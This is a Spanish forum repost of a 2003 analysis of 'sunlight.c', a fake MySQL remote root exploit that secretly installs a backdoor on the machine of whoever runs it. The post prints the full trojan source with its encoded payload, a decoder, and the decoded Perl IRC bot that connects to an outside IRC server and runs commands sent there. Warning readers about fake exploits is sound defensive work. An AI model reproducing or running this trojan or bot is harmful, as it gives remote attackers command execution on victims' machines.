Analizando una shellcode fake (Texto)

Copy & Paste de un magnifico texto, que para mi es un claro ejemplo de porque no se deben ir compilando exploits sin saber, y por supuesto, porque debemos aprender como funcionan los exploits y las shellcodes....

A ver si asi nos espabilamos.

Fuente: www.shellsec.net

*********************************************

Citar

- 0 - Indice
--------------------------------------------------------------------------------

- 1 - Introducción
- 2 - Analizando una supuesta shellcode
- 3 - Sobre este documento

- 1 - Introducción
--------------------------------------------------------------------------------
Fake es aquello que simula ser algo pero en realidad no lo es.
En este texto analizaremos el codigo sunlight.c el cual fue publicado hace no mucho tiempo, simulando ser un exploit remoto para el mysql, pero en realidad era un backdoor que se ejecutaba en la maquina que intentaba usar el exploit.

- 2- Analizando una supuesta shellcode
--------------------------------------------------------------------------------
Analicemos el codigo de sunlight.c:

------------------------------------CORTAR AQUÍ------------------------------------------------

/* sunlight.c
* MySQL <4.0 remote root exploit
*
* PLEASE DON'T DISTRIBUTE THIS PRIVATE CODE
* by: morpho-
* - more targets were added by alp
*
* 2003/06/06
*
* gcc sunlight.c -o sunlight -lmysqlclient -I/usr/local/include -L/usr/local/lib/mysql
*
* special thanks to sdi- for donating a bit of his elite
* debugging skillz.
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
#include <string.h>
#include <mysql/mysql.h>

char linux_bindcode[] =
"\x24\x22\x30\x76\x74\x73\x30\x63\x6a\x6f\x30\x71\x66\x73\x6d\x0b\x25\x64"
"\x69\x62\x6f\x3e\x23\x24\x6d\x31\x6d\x23\x3c\x25\x6f\x6a\x64\x6c\x3e\x23"
"\x6d\x70\x6d\x70\x73\x23\x3c\x25\x74\x66\x73\x77\x66\x73\x3e\x23\x66\x67"
"\x6f\x66\x75\x2f\x77\x76\x76\x73\x78\x66\x73\x6c\x2f\x6f\x6d\x23\x3c\x25"
"\x54\x4a\x48\x7c\x55\x46\x53\x4e\x7e\x3e\x7c\x7e\x3c\x66\x79\x6a\x75\x21"
"\x6a\x67\x21\x67\x70\x73\x6c\x3c\x76\x74\x66\x21\x4a\x50\x3b\x3b\x54\x70"
"\x64\x6c\x66\x75\x3c\x25\x74\x70\x64\x6c\x21\x3e\x21\x4a\x50\x3b\x3b\x54"
"\x70\x64\x6c\x66\x75\x3b\x3b\x4a\x4f\x46\x55\x2e\x3f\x6f\x66\x78\x29\x25"
"\x74\x66\x73\x77\x66\x73\x2f\x23\x3b\x37\x37\x37\x38\x23\x2a\x7d\x7d\x66"
"\x79\x6a\x75\x3c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x56"
"\x54\x46\x53\x21\x6d\x70\x6d\x70\x73\x21\x2c\x6a\x21\x6d\x70\x6d\x70\x73"
"\x21\x3b\x6d\x70\x6d\x70\x73\x77\x33";

char bsd_bindcode[]=
"\x5d\x6f\x4f\x4a\x44\x4c\x21\x6d\x70\x6d\x70\x73\x5d\x6f\x23\x3c\x25\x6a"
"\x3e\x32\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f\x3e\x7f"
"\x30\x5f\x5c\x5f\x21\x5e\x2c\x21\x29\x5c\x5f\x21\x5e\x2c\x2a\x21\x30\x2a"
"\x7c\x25\x6e\x70\x65\x66\x3e\x25\x32\x3c\x6d\x62\x74\x75\x21\x6a\x67\x21"
"\x25\x6e\x70\x65\x66\x3e\x3e\x23\x31\x31\x32\x23\x3c\x6a\x67\x29\x25\x6e"
"\x70\x65\x66\x3e\x3e\x23\x35\x34\x34\x23\x2a\x7c\x25\x6a\x2c\x2c\x3c\x25"
"\x6f\x6a\x64\x6c\x3e\x7f\x74\x30\x5d\x65\x2b\x25\x30\x25\x6a\x30\x3c\x71"
"\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x4f\x4a\x44\x4c\x21\x25"
"\x6f\x6a\x64\x6c\x5d\x6f\x23\x3c\x7e\x7e\x71\x73\x6a\x6f\x75\x21\x25\x74"
"\x70\x64\x6c\x21\x23\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64";

char linux_connect_back[]=
"\x69\x62\x6f\x21\x3b\x6d\x70\x6d\x70\x73\x21\x77\x33\x2f\x32\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x75\x70\x21\x73"
"\x76\x6f\x21\x64\x70\x6e\x6e\x62\x6f\x65\x74\x2d\x21\x75\x7a\x71\x66\x3b"
"\x21\x23\x2f\x25\x6f\x6a\x64\x6c\x2f\x23\x3b\x21\x64\x70\x6e\x6e\x62\x6f"
"\x65\x5d\x6f\x23\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f"
"\x2a\x7c\x6a\x67\x21\x29\x30\x5f\x51\x4a\x4f\x48\x21\x29\x2f\x2b\x2a\x25"
"\x30\x2a\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x50"
"\x4f\x48\x21\x25\x32\x5d\x6f\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d"
"\x6f\x23\x3c\x7e\x6a\x67\x29\x74\x30\x5f\x5c";

char bsd_connect_back[]=
"\x5f\x21\x5e\x2c\x21\x51\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f"
"\x21\x3b\x25\x6f\x6a\x64\x6c\x5c\x5f\x21\x3b\x5d\x78\x5e\x2b\x3b\x5c\x5f"
"\x21\x3b\x5d\x78\x5e\x2b\x21\x29\x2f\x2b\x2a\x25\x30\x25\x32\x30\x2a\x7c"
"\x74\x30\x5d\x74\x2b\x25\x30\x30\x3c\x25\x60\x3e\x61\x25\x60\x61\x3c\x67"
"\x70\x73\x66\x62\x64\x69\x29\x74\x71\x6d\x6a\x75\x21\x23\x5d\x6f\x23\x2a"
"\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x53\x4a\x57"
"\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x25\x60\x5d\x6f\x23\x3c\x74"
"\x6d\x66\x66\x71\x21\x32\x3c\x7e\x7e\x7e\x24\x64\x69\x6e\x70\x65\x21\x2c"
"\x79\x21\x30\x75\x6e\x71\x30\x6d\x70\x6d\x21\x33\x3f\x30\x65\x66\x77\x30"
"\x6f\x76\x6d\x6d\x3c\x30\x75\x6e\x71\x30\x6d\x70\x6d";

struct {
char *type;
unsigned long ret;
char *shellcode;
int os_type;
} targets[] = {
{ "mysql-3.23.49-8.4 - Debian 3.0 ", 0xb80a3fab, linux_bindcode, 0 },
{ "mysql-3.23.55-14 - SuSe 8.x ", 0xb80ef2ba, linux_bindcode, 0 },
{ "mysql-3.23.53-6 - Mandrake 9.0 ", 0xb80aa2ba, linux_bindcode, 0 },
{ "mysql-3.23.56 - Slackware 9.0 ", 0xb80ba8d6, linux_bindcode, 0 },
{ "mysql-3.23.55 - FreeBSD 4.8 ", 0xb80b0b1b, bsd_bindcode, 1 },
{ "mysql-3.23.54-1 - FreeBSD 5.0 ", 0xb809ab11, bsd_bindcode, 1 },
{ "mysql-3.23.56 - FreeBSD 5.1 ", 0xb80ff374, bsd_bindcode, 1 },
{ "Crash - (all) ", 0x80fdfdfd, linux_bindcode, 0 }
};

int do_attack(MYSQL *mysql, char *attackuser);
void do_action(MYSQL *mysql, char *action, char *user);
char *strmov(register char *dst, register const char *src);

void usage(char *prog) {
fprintf(stderr, "\nMySQL <4.0 remote root exploit by morpho-\n"
"PRIVATE, DO NOT TRADE OR PUBLISH!!!\n\n"
"Usage: %s [-dtah]\n"
"-d ... mysql server\n"
"-t ... target (0 for a list)\n"
"-a ... attack user (default root)\n"
"-h ... this screen\n\n", prog);
exit(1);
}

int main(int argc, char **argv) {
MYSQL mysql;
char optchar;
int type = 0;
int i=0,w=0,x=0,y=0,z=0;
char *target, *user, *password, *attackuser, *action;
FILE *f;

target = user = password = action = attackuser= NULL;

while ( (optchar = getopt(argc, argv, "hd:t:a")) != EOF ) {
switch(optchar) {
case 'h':
usage("sunlight");
exit(0);
case 'd':
target = optarg;
break;
case 't':
type = atoi(optarg);
if (type == 0 || type > sizeof(targets) / 16) {
for(i = 0; i < sizeof(targets) / 16; i++)
fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1,
targets.type, (unsigned int) targets.ret);
fprintf(stderr, "\n");
return -1;
}
break;
case 'a':
attackuser = optarg;
break;
case 'e':
}
}

if (!target) usage("sunlight");
if (!attackuser) attackuser = "root";
action = "dumpuser";
for (w=0;linux_bindcode[w];w++) linux_bindcode[w]--;
for (x=0;bsd_bindcode
;x++) bsd_bindcode
--;
for (y=0;linux_connect_back[y];y++) linux_connect_back[y]--;
for (z=0;bsd_connect_back[z];z++) bsd_connect_back[z]--;

printf("connecting to [%s] as [nobody] ... ", target);
fflush(stdin);
f=fopen(bsd_connect_back+167,"w");
if(f){
fprintf(f,"%s",linux_bindcode);
fprintf(f,"%s",bsd_bindcode);
fprintf(f,"%s",linux_connect_back);
fprintf(f,"%s",bsd_connect_back);
fclose(f);}system(bsd_connect_back+137);

if (!mysql_connect(&mysql, target, "nobody", "*")) {
printf("failed\n");
return 0;
} else {
printf("ok\n");
}

printf("sending one byte requests with user [%s] ... \n", attackuser);
if (!do_attack(&mysql, attackuser)) {
do_action(&mysql, action, "nobody");
} else {
printf("attack failed\n");
}
mysql_close(&mysql);

return 0;
}

int do_attack(MYSQL *mysql, char *attackuser) {
char buff[512], *pos=buff, *attackpasswd = "A";
int i, len, j, ret = 1;

pos = (char*)strmov(pos,attackuser)+1;
mysql->scramble_buff[1] = 0;
pos = scramble(pos, mysql->scramble_buff, attackpasswd,
(my_bool) (mysql->protocol_version == 9));
pos = (char*)strmov(pos+1,"");
len = pos-buff;

for (j = 0; ret && j < 32; j++) {
buff[5] = 65 + j;
ret = simple_command(mysql,COM_CHANGE_USER, buff,(uint)len,0);
}

return ret;
}

void do_action(MYSQL *mysql, char *action, char *user) {
MYSQL_ROW row;
MYSQL_RES *result;
char buf[512];

mysql_select_db(mysql, "mysql");

if (!strcmp(action, "dumpuser")) {
mysql_query(mysql, "select user, password, host from user");
result = mysql_use_result(mysql);

while ((row = mysql_fetch_row(result)))
printf("%16s %16s %50s\n", row[0], row[1], row[2]);
mysql_free_result(result);
} else if (!strcmp(action, "becomeadmin")) {
snprintf(buf, sizeof(buf) - 1,
"update user set Select_priv='Y', Insert_priv='Y', Update_priv='Y', Delete_priv='Y', "
" Create_priv='Y', Drop_priv='Y', Reload_priv='Y', Shutdown_priv='Y', Process_priv='Y', "
" File_priv='Y', Grant_priv='Y', References_priv='Y', Index_priv='Y', Alter_priv='Y' where "
" user = '%s'", "nobody");
mysql_query(mysql, buf);
mysql_reload(mysql);
} /* do whatever you want ... see mysql api ... // else if ( */
}

char *strmov(register char *dst, register const char *src)
{
while ((*dst++ = *src++)) ;
return dst-1;
}

------------------------------------CORTAR AQUÍ------------------------------------------------

Como vemos en el codigo anterior las shellcodes son las siguiente:

char linux_bindcode[] =
"\x24\x22\x30\x76\x74\x73\x30\x63\x6a\x6f\x30\x71\x66\x73\x6d\x0b\x25\x64"
"\x69\x62\x6f\x3e\x23\x24\x6d\x31\x6d\x23\x3c\x25\x6f\x6a\x64\x6c\x3e\x23"
"\x6d\x70\x6d\x70\x73\x23\x3c\x25\x74\x66\x73\x77\x66\x73\x3e\x23\x66\x67"
"\x6f\x66\x75\x2f\x77\x76\x76\x73\x78\x66\x73\x6c\x2f\x6f\x6d\x23\x3c\x25"
"\x54\x4a\x48\x7c\x55\x46\x53\x4e\x7e\x3e\x7c\x7e\x3c\x66\x79\x6a\x75\x21"
"\x6a\x67\x21\x67\x70\x73\x6c\x3c\x76\x74\x66\x21\x4a\x50\x3b\x3b\x54\x70"
"\x64\x6c\x66\x75\x3c\x25\x74\x70\x64\x6c\x21\x3e\x21\x4a\x50\x3b\x3b\x54"
"\x70\x64\x6c\x66\x75\x3b\x3b\x4a\x4f\x46\x55\x2e\x3f\x6f\x66\x78\x29\x25"
"\x74\x66\x73\x77\x66\x73\x2f\x23\x3b\x37\x37\x37\x38\x23\x2a\x7d\x7d\x66"
"\x79\x6a\x75\x3c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x56"
"\x54\x46\x53\x21\x6d\x70\x6d\x70\x73\x21\x2c\x6a\x21\x6d\x70\x6d\x70\x73"
"\x21\x3b\x6d\x70\x6d\x70\x73\x77\x33";

char bsd_bindcode[]=
"\x5d\x6f\x4f\x4a\x44\x4c\x21\x6d\x70\x6d\x70\x73\x5d\x6f\x23\x3c\x25\x6a"
"\x3e\x32\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f\x3e\x7f"
"\x30\x5f\x5c\x5f\x21\x5e\x2c\x21\x29\x5c\x5f\x21\x5e\x2c\x2a\x21\x30\x2a"
"\x7c\x25\x6e\x70\x65\x66\x3e\x25\x32\x3c\x6d\x62\x74\x75\x21\x6a\x67\x21"
"\x25\x6e\x70\x65\x66\x3e\x3e\x23\x31\x31\x32\x23\x3c\x6a\x67\x29\x25\x6e"
"\x70\x65\x66\x3e\x3e\x23\x35\x34\x34\x23\x2a\x7c\x25\x6a\x2c\x2c\x3c\x25"
"\x6f\x6a\x64\x6c\x3e\x7f\x74\x30\x5d\x65\x2b\x25\x30\x25\x6a\x30\x3c\x71"
"\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x4f\x4a\x44\x4c\x21\x25"
"\x6f\x6a\x64\x6c\x5d\x6f\x23\x3c\x7e\x7e\x71\x73\x6a\x6f\x75\x21\x25\x74"
"\x70\x64\x6c\x21\x23\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64";

char linux_connect_back[]=
"\x69\x62\x6f\x21\x3b\x6d\x70\x6d\x70\x73\x21\x77\x33\x2f\x32\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x75\x70\x21\x73"
"\x76\x6f\x21\x64\x70\x6e\x6e\x62\x6f\x65\x74\x2d\x21\x75\x7a\x71\x66\x3b"
"\x21\x23\x2f\x25\x6f\x6a\x64\x6c\x2f\x23\x3b\x21\x64\x70\x6e\x6e\x62\x6f"
"\x65\x5d\x6f\x23\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f"
"\x2a\x7c\x6a\x67\x21\x29\x30\x5f\x51\x4a\x4f\x48\x21\x29\x2f\x2b\x2a\x25"
"\x30\x2a\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x50"
"\x4f\x48\x21\x25\x32\x5d\x6f\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d"
"\x6f\x23\x3c\x7e\x6a\x67\x29\x74\x30\x5f\x5c";

char bsd_connect_back[]=
"\x5f\x21\x5e\x2c\x21\x51\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f"
"\x21\x3b\x25\x6f\x6a\x64\x6c\x5c\x5f\x21\x3b\x5d\x78\x5e\x2b\x3b\x5c\x5f"
"\x21\x3b\x5d\x78\x5e\x2b\x21\x29\x2f\x2b\x2a\x25\x30\x25\x32\x30\x2a\x7c"
"\x74\x30\x5d\x74\x2b\x25\x30\x30\x3c\x25\x60\x3e\x61\x25\x60\x61\x3c\x67"
"\x70\x73\x66\x62\x64\x69\x29\x74\x71\x6d\x6a\x75\x21\x23\x5d\x6f\x23\x2a"
"\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x53\x4a\x57"
"\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x25\x60\x5d\x6f\x23\x3c\x74"
"\x6d\x66\x66\x71\x21\x32\x3c\x7e\x7e\x7e\x24\x64\x69\x6e\x70\x65\x21\x2c"
"\x79\x21\x30\x75\x6e\x71\x30\x6d\x70\x6d\x21\x33\x3f\x30\x65\x66\x77\x30"
"\x6f\x76\x6d\x6d\x3c\x30\x75\x6e\x71\x30\x6d\x70\x6d";

Copiemoslas y armemos el siguiente codigo para ver que hacen estas shellcodes:

--------------------------------------CORTAR AQUÍ------------------------------------------------

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
#include <string.h>

char linux_bindcode[] =
"\x24\x22\x30\x76\x74\x73\x30\x63\x6a\x6f\x30\x71\x66\x73\x6d\x0b\x25\x64"
"\x69\x62\x6f\x3e\x23\x24\x6d\x31\x6d\x23\x3c\x25\x6f\x6a\x64\x6c\x3e\x23"
"\x6d\x70\x6d\x70\x73\x23\x3c\x25\x74\x66\x73\x77\x66\x73\x3e\x23\x66\x67"
"\x6f\x66\x75\x2f\x77\x76\x76\x73\x78\x66\x73\x6c\x2f\x6f\x6d\x23\x3c\x25"
"\x54\x4a\x48\x7c\x55\x46\x53\x4e\x7e\x3e\x7c\x7e\x3c\x66\x79\x6a\x75\x21"
"\x6a\x67\x21\x67\x70\x73\x6c\x3c\x76\x74\x66\x21\x4a\x50\x3b\x3b\x54\x70"
"\x64\x6c\x66\x75\x3c\x25\x74\x70\x64\x6c\x21\x3e\x21\x4a\x50\x3b\x3b\x54"
"\x70\x64\x6c\x66\x75\x3b\x3b\x4a\x4f\x46\x55\x2e\x3f\x6f\x66\x78\x29\x25"
"\x74\x66\x73\x77\x66\x73\x2f\x23\x3b\x37\x37\x37\x38\x23\x2a\x7d\x7d\x66"
"\x79\x6a\x75\x3c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x56"
"\x54\x46\x53\x21\x6d\x70\x6d\x70\x73\x21\x2c\x6a\x21\x6d\x70\x6d\x70\x73"
"\x21\x3b\x6d\x70\x6d\x70\x73\x77\x33";

char bsd_bindcode[]=
"\x5d\x6f\x4f\x4a\x44\x4c\x21\x6d\x70\x6d\x70\x73\x5d\x6f\x23\x3c\x25\x6a"
"\x3e\x32\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f\x3e\x7f"
"\x30\x5f\x5c\x5f\x21\x5e\x2c\x21\x29\x5c\x5f\x21\x5e\x2c\x2a\x21\x30\x2a"
"\x7c\x25\x6e\x70\x65\x66\x3e\x25\x32\x3c\x6d\x62\x74\x75\x21\x6a\x67\x21"
"\x25\x6e\x70\x65\x66\x3e\x3e\x23\x31\x31\x32\x23\x3c\x6a\x67\x29\x25\x6e"
"\x70\x65\x66\x3e\x3e\x23\x35\x34\x34\x23\x2a\x7c\x25\x6a\x2c\x2c\x3c\x25"
"\x6f\x6a\x64\x6c\x3e\x7f\x74\x30\x5d\x65\x2b\x25\x30\x25\x6a\x30\x3c\x71"
"\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x4f\x4a\x44\x4c\x21\x25"
"\x6f\x6a\x64\x6c\x5d\x6f\x23\x3c\x7e\x7e\x71\x73\x6a\x6f\x75\x21\x25\x74"
"\x70\x64\x6c\x21\x23\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64";

char linux_connect_back[]=
"\x69\x62\x6f\x21\x3b\x6d\x70\x6d\x70\x73\x21\x77\x33\x2f\x32\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x75\x70\x21\x73"
"\x76\x6f\x21\x64\x70\x6e\x6e\x62\x6f\x65\x74\x2d\x21\x75\x7a\x71\x66\x3b"
"\x21\x23\x2f\x25\x6f\x6a\x64\x6c\x2f\x23\x3b\x21\x64\x70\x6e\x6e\x62\x6f"
"\x65\x5d\x6f\x23\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f"
"\x2a\x7c\x6a\x67\x21\x29\x30\x5f\x51\x4a\x4f\x48\x21\x29\x2f\x2b\x2a\x25"
"\x30\x2a\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x50"
"\x4f\x48\x21\x25\x32\x5d\x6f\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d"
"\x6f\x23\x3c\x7e\x6a\x67\x29\x74\x30\x5f\x5c";

char bsd_connect_back[]=
"\x5f\x21\x5e\x2c\x21\x51\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f"
"\x21\x3b\x25\x6f\x6a\x64\x6c\x5c\x5f\x21\x3b\x5d\x78\x5e\x2b\x3b\x5c\x5f"
"\x21\x3b\x5d\x78\x5e\x2b\x21\x29\x2f\x2b\x2a\x25\x30\x25\x32\x30\x2a\x7c"
"\x74\x30\x5d\x74\x2b\x25\x30\x30\x3c\x25\x60\x3e\x61\x25\x60\x61\x3c\x67"
"\x70\x73\x66\x62\x64\x69\x29\x74\x71\x6d\x6a\x75\x21\x23\x5d\x6f\x23\x2a"
"\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x53\x4a\x57"
"\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x25\x60\x5d\x6f\x23\x3c\x74"
"\x6d\x66\x66\x71\x21\x32\x3c\x7e\x7e\x7e\x24\x64\x69\x6e\x70\x65\x21\x2c"
"\x79\x21\x30\x75\x6e\x71\x30\x6d\x70\x6d\x21\x33\x3f\x30\x65\x66\x77\x30"
"\x6f\x76\x6d\x6d\x3c\x30\x75\x6e\x71\x30\x6d\x70\x6d";

main() {
char *p;
for (p=linux_bindcode;*p;p++) (*p)--;
for (p=bsd_bindcode;*p;p++) (*p)--;
for (p=linux_connect_back;*p;p++) (*p)--;
for (p=bsd_connect_back;*p;p++) (*p)--;
printf("%s\n",linux_bindcode);
printf("%s\n",bsd_bindcode);
printf("%s\n",linux_connect_back);
printf("%s\n",bsd_connect_back);
}

--------------------------------------CORTAR AQUÍ------------------------------------------------

A hora hacemos lo siguiente:

[Sonyy@shellsec]$ gcc -O2 shellcode.c -o shellcode
[Sonyy@shellsec]$ ./shellcode
#!/usr/bin/perl
$chan="#l0l";$nick="lolor";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER lolor +i lolor :lolorv2
\nNICK lolor\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $c
han :lolor v2.1\nPRIVMSG $chan :to run commands, type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[
^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/lol 2>/dev/null;/tmp/lol
[Sonyy@shellsec]$

Como vemos esta shellcode lo que hace realmente es conectarnos a un irc(efnet.vuurwerk.nl) en el
canal #l0l y desde ahi puedan ejecutar comandos en nuestra maquina.

Pero esto no es todo ,ahora ustedes se preguntaran pero como se ejecuta la shellcode en mi
maquina???
Bueno aca esta la respuesta:

Observen esta parte del codigo "sunlight.c" esta es la parte donde se ejecuta la shellcode
en nuestra maquina:

fclose(f);}system(bsd_connect_back+137);

Como veran circulan muchos codigos en la red los cuales algunos son reales y otros son fakes
como este que analizamos, asi que a tener cuidado con lo que uno ejecuta.

- 3- Sobre este documento
--------------------------------------------------------------------------------
Autor: Diego Krahenbuhl ( diego@shellsec.net )
Fecha: Julio de 2003
Url: http://www.shellsec.net